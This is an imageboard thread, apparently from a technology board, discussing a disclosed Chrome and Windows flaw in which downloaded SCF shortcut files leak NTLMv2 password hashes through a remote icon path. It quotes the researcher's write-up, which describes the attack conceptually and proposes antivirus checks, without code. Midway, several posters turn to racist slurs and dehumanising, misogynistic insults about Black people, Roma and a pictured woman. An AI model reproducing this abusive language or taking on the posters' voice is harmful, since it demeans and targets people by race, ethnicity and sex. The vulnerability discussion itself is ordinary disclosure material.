Discovered by DefenseCode security researcher Bosko Stankovic (via ZDNet), the flaw works through a clever trick in the way Chrome and Windows both treat Windows Explorer Shell Command File (SCF) files, which are used as a Show Desktop icon shortcut. The end result is that the SCF file can be used to obtain a users LAN Manager (NTLMv2) password hash.
>Chrome users can protect themselves by disabling automatic downloads. This can be done in Settings, and selecting Show advanced settings, followed by checking the option to 'Ask where to save each file before downloading'. Yawwwwwwwwwn
Joseph Young
>load up bugzilla >over 100 pages of critical security issues niiiice
Aaron Miller
>Windows
Cameron Davis
Not this thread again...
Bentley Green
>Another >it's the same as posted yesterday ḧmmm
Asher Carter
>Ungoogled Chromium >Windows 7 >Encrypted I think im safe senpai-desu
Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous.
All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of IconFile parameter considering there are no legitimate uses of SCF with remote icon locations.
Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim's authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources.
We hope that the Google Chrome browser will be updated to address this flaw in the near future.
Jeremiah Johnson
You're not safe
Jaxon Bell
He is since Chromium doesn't have auto-updates, you are not capable of reading the article, and you don't know Chromium's nuances.
Jack Walker
You don't need updates for this to work, it just requires visiting a site. If you're on Chromium you're even further behind in security.
Hudson Evans
As i've said, you are incapable of reading English and the article. The first user in this thread is though.
Grayson Sanchez
>Windows 10 HA
Robert Ross
The Apple MacBook Pro with Retina Display doesn't have this problem.
Leo Reed
wtf is wrong with her feet? o_O god fucking damn it, nigger genetics are complete shit
Charles Gomez
>proceeds to post a hair dyed gypsie whore
Noah Gutierrez
stop posting orangutans on my board
Eli Morales
what kind of mystery meat is that?
Adrian Cook
tanya :3
Brody Butler
check the latest build of chromium and the latest autoupdated version of chrome idiot. chrome is far behind chromium.
Jason Myers
WHO IS THIS SEMEN DEMON
Christian Campbell
Kek
Owen Perez
no one posted trump
Charles Adams
...
Ayden Peterson
>posting a dyed hair brown eyed Ukrainian gypsy whore who's parents sold her into sex slavery when she was a child
Parker Jackson
SAUCE
Xavier Mitchell
...
Luke Myers
I didn't ask you, you 12yo edgelord.
Jaxson Gray
>Guy finds exploit >Google will fix with an update >Chrome now has 1 less exploit
Wouldn't it be better to use Chrome after this?
Aaron Bennett
Is there anything in this world that's not a complete piece of shit security wise?
Luis Miller
no, read vault7
Josiah Collins
>being this ass blasted
Camden Evans
SAUCE ME UP
Tyler Collins
...
Zachary Phillips
>he thinks he can troll people with something like this are you from reddit?
Grayson Moore
>"There is no need to click or open the downloaded file -- Windows File Explorer will automatically try to retrieve the 'icon'," notes Stankovic. Well, shit
Angel Clark
nobody asked you to link sheboons there bud. here is a picture of a human being with a developed neo cortex. faggot.
Wyatt Ward
what if you use 3rd party thumbnail generators? I do.
Camden Murphy
I help you, friend. I not troll :) You asked for brown persons, I gave you. Enjoy.